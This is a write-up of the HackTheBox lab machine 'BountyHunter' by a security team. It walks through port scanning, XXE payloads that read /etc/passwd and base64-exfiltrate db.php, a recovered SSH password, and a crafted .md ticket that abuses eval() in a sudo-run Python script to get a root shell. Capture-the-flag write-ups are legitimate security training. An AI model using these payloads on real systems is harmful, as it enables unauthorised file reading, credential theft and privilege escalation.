image/svg+xml Watch4Hack's Web (Cybersecurity team)

HackTheBox's Machine WriteUp - BountyHunter

  • BinaryShadow
  • Nov 04, 2021

image

Reconnaissance

We use nmap to discover open ports in the target machine:

sudo nmap -sS -sV -T5 -vvv -p- 10.10.11.100

After a few seconds we get the following output.

Starting Nmap 7.92 ( https://nmap.org ) at 2021-11-02 18:34 CET
NSE: Loaded 45 scripts for scanning.
Initiating Ping Scan at 18:34
Scanning 10.10.11.100 [4 ports]
Completed Ping Scan at 18:34, 0.08s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 18:34
Completed Parallel DNS resolution of 1 host. at 18:34, 0.02s elapsed
DNS resolution of 1 IPs took 0.02s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 18:34
Scanning 10.10.11.100 [65535 ports]
Discovered open port 22/tcp on 10.10.11.100
Discovered open port 80/tcp on 10.10.11.100
Completed SYN Stealth Scan at 18:34, 24.81s elapsed (65535 total ports)
Initiating Service scan at 18:34
Scanning 2 services on 10.10.11.100
Completed Service scan at 18:34, 6.09s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.11.100.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 18:34
Completed NSE at 18:34, 0.22s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 18:34
Completed NSE at 18:34, 0.17s elapsed
Nmap scan report for 10.10.11.100
Host is up, received echo-reply ttl 63 (0.044s latency).
Scanned at 2021-11-02 18:34:17 CET for 32s
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.41 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.77 seconds
           Raw packets sent: 66297 (2.917MB) | Rcvd: 66294 (2.652MB)

The machine has only the SSH service and a web service open.

Discovery and Scanning

It’s time to discover directories and files on the web. We use gobuster to ennumerate the web service.

gobuster dir -u http://10.10.11.100/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 40 -x php

)

In the resources directory we find some interesting files:

README.txt

bountylog.js


Exploitation

In bountylog.js we can see that traker_diRbPr00f314.php is vulnerable to XXE. The next step is to capture the POST request and modify it with Bursuite (Repeater).

Now, we need to make a custom XML to confirm the XXE vulnerability. (See: https://github.com/payloadbox/xxe-injection-payload-list)

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ENTITY file SYSTEM "file:///etc/passwd" >]>
	<bugreport>
	<title>test</title>
	<cwe>test</cwe>
	<cvss>test</cvss>
	<reward>&file;</reward>
	</bugreport>

To check if the site is vulnerable to XXE, we try to get the passwd with our payload:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
sshd:x:111:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
development:x:1000:1000:Development:/home/development:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
usbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin

The only user in the system is development. Now, let’s exfiltrate the db.php file from the web with the following XML:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ENTITY file SYSTEM "php://filter/convert.base64-encode/resource=./db.php" >]>
	<bugreport>
		<title>test</title>
		<cwe>test</cwe>
		<cvss>test</cvss>
 		<reward>&file;</reward>
	</bugreport>

We obtain the credentials for the database, it is possible that the user reuses the password of the system account. We can now connect to the development user with these credentials via ssh.

development : m19RoAU0hP41A1sTsq6K


Privilege Escalation

In development home directory we find the following note:

contract.txt

From what we can read, we can think that we have sudo permissions for something, we use the command sudo -l to check it.

We can execute **ticketValidator.py** python script with root permissions.

**ticketValidator.py**

#Skytrain Inc Ticket Validation System 0.1
#Do not distribute this file.

def load_file(loc):
    if loc.endswith(".md"):
        return open(loc, 'r')
    else:
        print("Wrong file type.")
        exit()

def evaluate(ticketFile):
    #Evaluates a ticket to check for ireggularities.
    code_line = None
    for i,x in enumerate(ticketFile.readlines()):
        if i == 0:
            if not x.startswith("# Skytrain Inc"):
                return False
            continue
        if i == 1:
            if not x.startswith("# Ticket to "):
                return False
            print(f"Destination: {' '.join(x.strip().split(' ')[3:])}")
            continue

        if x.startswith("__Ticket Code:__"):
            code_line = i+1
            continue

        if code_line and i == code_line:
            if not x.startswith("**"):
                return False
            ticketCode = x.replace("**", "").split("+")[0]
            if int(ticketCode) % 7 == 4:
                validationNumber = eval(x.replace("**", ""))
                if validationNumber > 100:
                    return True
                else:
                    return False
    return False

def main():
    fileName = input("Please enter the path to the ticket file.\n")
    ticket = load_file(fileName)
    #DEBUG print(ticket)
    result = evaluate(ticket)
    if (result):
        print("Valid ticket.")
    else:
        print("Invalid ticket.")
    ticket.close

main()

Line 34 of the script is vulnerable to command injection. Now, we need create a ticket in a .md file to get a root shell.

# Skytrain Inc
# Ticket to BinaryShadow
__Ticket Code:__
**4+10==14 and __import__('os').execl('/bin/bash','bash')

Finally, we run the python scritp and use our .md file to obtain a root shell.

© Watch4Hack's Web (Cybersecurity team) 2021.
Search